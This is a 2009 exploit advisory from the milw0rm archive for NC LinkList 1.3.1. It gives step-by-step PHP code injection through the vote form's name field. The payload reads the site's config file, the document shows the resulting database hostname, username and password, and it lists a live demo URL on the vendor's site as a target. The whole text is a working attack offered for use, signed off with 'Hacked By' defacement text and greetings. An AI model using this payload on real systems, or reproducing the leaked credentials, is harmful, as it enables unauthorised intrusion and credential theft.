50 lines
No EOL
1.6 KiB
Text
50 lines
No EOL
1.6 KiB
Text
--------------------------------------------------------------
|
|
NC LinkList 1.3.1 Remote Command injection Exploit
|
|
---------------------------------------------------------------
|
|
Founder :ThE g0bL!N
|
|
Vendor:http://www.php-linkverzeichnis.de
|
|
Thank You Very Much His0k4
|
|
Note: You Can choose Any Function in Php :)
|
|
---------------------------------------------------------------
|
|
Exploit:
|
|
--------
|
|
1) Go To Url:
|
|
---------
|
|
http://wwww.victim.co.il/[path]/index.php?action=vote&link=$number of links
|
|
|
|
2) Write In:
|
|
--------
|
|
Ihr Name: <? readfile("./inc/config.inc.php"); ?>.
|
|
Ihre E-Mail: x0q@hotmail.fr
|
|
Ihre Bewertung:10 sehr Gut # bel Hendia allah yahfad wa youstour
|
|
Kommentar: Hacked By ThE g0bL!N
|
|
|
|
3) Post The Topic:
|
|
--------------
|
|
|
|
4) Then Go to:
|
|
-----------
|
|
http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=$number of links .
|
|
|
|
5) View Source:
|
|
-----------
|
|
|
|
Exapmle:
|
|
--------
|
|
1)http://wwww.victim.co.il/[path]/index.php?action=vote&link=20000
|
|
2)http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=20000
|
|
|
|
Result:
|
|
--------
|
|
$db_host = "localhost"; // MySQL - Hostname
|
|
$db_user = "d009b9e8"; // MySQL - Username
|
|
$db_pwd = "iwkpwd99"; // MySQL - Passwort
|
|
$db_name = "d009b9e8"; // MySQL - database
|
|
Demo:
|
|
----
|
|
http://www.php-linkverzeichnis.de/demo/index.php?action=vote&link=800
|
|
----------------------------------------------------------------
|
|
Greetz : His0k4 Dos-Dz TeaM Snakes TeaM And All My Freinds (dz)
|
|
-----------------------------------------------------------------
|
|
|
|
# milw0rm.com [2009-05-20] |